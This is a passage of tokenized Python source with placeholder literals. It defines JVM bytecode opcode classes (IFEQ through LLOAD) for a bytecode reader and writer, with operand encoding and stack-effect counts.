classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . 
read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IFEQ ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFEQ , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFGE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFGE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFGT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFGT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . 
offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFLE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFLE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFLT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFLT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFNE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFNE , self ) . __init__ ( ) <EOL> self . 
offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFNONNULL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFNONNULL , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFNULL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFNULL , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . 
offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IINC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , index , const ) : <EOL> super ( IINC , self ) . __init__ ( ) <EOL> self . index = index <EOL> self . const = const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . index , self . const ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> index = reader . read_u1 ( ) <EOL> const = reader . read_u1 ( ) <EOL> return cls ( index , const ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . index ) <EOL> writer . write_u1 ( self . const ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ILOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_0 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class IMPDEP1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IMPDEP1 , self ) . __init__ ( ) <EOL> class IMPDEP2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IMPDEP2 , self ) . __init__ ( ) <EOL> class IMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class INEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( INEG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class INSTANCEOF ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( INSTANCEOF , self ) . 
__init__ ( ) <EOL> self . klass = Classref ( class_name ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . klass . class_name <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> klass = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . klass ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . klass . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class INVOKEDYNAMIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKEDYNAMIC , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . class_name , self . method . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> reader . read_u2 ( ) <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> writer . write_u2 ( <NUM_LIT:0> ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . 
name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class INVOKEINTERFACE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKEINTERFACE , self ) . __init__ ( ) <EOL> self . method = InterfaceMethodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . class_name , self . method . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> reader . read_u1 ( ) <EOL> reader . read_u1 ( ) <EOL> return cls ( <EOL> method . class_name , <EOL> method . name , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) , <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> writer . write_u1 ( len ( self . method . descriptor . parameters ) + <NUM_LIT:1> ) <EOL> writer . write_u1 ( <NUM_LIT:0> ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class INVOKESPECIAL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKESPECIAL , self ) . __init__ ( ) <EOL> self . 
method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . klass . name , self . method . name_and_type . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ property <EOL> def class_name ( self ) : <EOL> return self . method . class_name <EOL> @ property <EOL> def method_name ( self ) : <EOL> return self . method . method_name <EOL> @ property <EOL> def descriptor ( self ) : <EOL> return self . method . descriptor <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class INVOKESTATIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKESTATIC , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . klass . name , self . method . name_and_type . name , self . method . name_and_type . 
descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return len ( self . method . descriptor . parameters ) <EOL> class INVOKEVIRTUAL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKEVIRTUAL , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . klass . name , self . method . name_and_type . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . 
method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class IOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IOR , self ) . __init__ ( ) <EOL> class IREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISHL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISHL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class ISHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISHR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class ISTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ISTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . 
read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISUB , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IUSHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IUSHR , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IXOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IXOR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class JSR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( JSR , self ) . __init__ ( ) <EOL> class JSR_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( JSR_W , self ) . __init__ ( ) <EOL> class L2D ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( L2D , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class L2F ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( L2F , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class L2I ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( L2I , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class LADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LALOAD , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LAND ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LAND , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class LCMP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LCMP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LCONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LCONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LCONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LCONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( LDC , self ) . __init__ ( ) <EOL> if isinstance ( const , str ) : <EOL> self . const = String ( const ) <EOL> elif isinstance ( const , int ) : <EOL> self . const = Integer ( const ) <EOL> elif isinstance ( const , Constant ) : <EOL> self . 
const = const <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % type ( const ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u1 ( ) <EOL> return cls ( reader . constant_pool [ const ] ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( writer . constant_pool . index ( self . const ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . const . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDC_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( LDC_W , self ) . __init__ ( ) <EOL> if isinstance ( const , str ) : <EOL> self . const = String ( const ) <EOL> elif isinstance ( const , int ) : <EOL> self . const = Integer ( const ) <EOL> elif isinstance ( const , float ) : <EOL> self . const = Float ( const ) <EOL> elif isinstance ( const , Constant ) : <EOL> self . const = const <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % type ( const ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u2 ( ) <EOL> return cls ( reader . constant_pool [ const ] ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . const ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . const . 
resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDC2_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( LDC2_W , self ) . __init__ ( ) <EOL> if isinstance ( const , float ) : <EOL> self . const = Double ( const ) <EOL> elif isinstance ( const , int ) : <EOL> self . const = Long ( const ) <EOL> elif isinstance ( const , Constant ) : <EOL> self . const = const <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % type ( const ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u2 ( ) <EOL> return cls ( reader . constant_pool [ const ] ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . const ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . const . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LLOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( LLOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : 